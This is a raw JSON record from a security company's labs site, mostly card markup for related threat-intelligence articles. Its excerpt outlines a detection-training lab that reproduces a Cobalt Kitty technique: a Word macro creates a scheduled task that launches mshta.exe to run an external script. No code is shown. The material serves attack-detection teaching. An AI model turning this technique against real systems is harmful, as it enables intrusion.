300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">AI security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">GREYVIBE: A Russia-nexus group leveraging AI across state-aligned operations<\/h3>\n                                    <p class=\"wp-component-card-insight__read-time\">15<\/p>\n                                    <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/greyvibe\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                            <h3 class=\"wp-component-card-insight__title\">WithSecure uncovers Russia-nexus threat group using AI to target Ukraine and European organisations<\/h3>\n                                                    <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/10919\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/darkgate-rises\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>In this next lab, we are going to reproduce one of the attack vectors used by the Cobalt Kitty group. We will build upon previous labs to produce a Word macro that creates a Scheduled Task that spawns &#8216;mshta.exe&#8217; to run an external script. <\/p>\n","protected":false},"author":3,"featured_media":8859,"template":"","categories":[240,237,271],"labs_content_type":[296],"class_list":["post-7584","lab_item","type-lab_item","status-publish","has-post-thumbnail","hentry","category-attack-detection","category-network-security","category-offensive-security"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research2.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research2.jpg 1200w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research2-300x200.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research2-1024x683.jpg 1024w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research2-768x512.jpg 768w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research2-447x298.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research2-219x146.jpg 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Network Security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Offensive security<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals: Initial Access &#8211; Lab #3<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">In this next lab, we are going to reproduce one of the attack vectors used by the Cobalt Kitty group. We will build upon previous labs to produce a Word macro that creates a Scheduled Task that spawns &#039;mshta.exe&#039; to run an external script. <\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/lab_item\/7584","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/users\/3"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/media\/8859"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/media?parent=7584"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/categories?post=7584"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/labs_content_type?post=7584"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}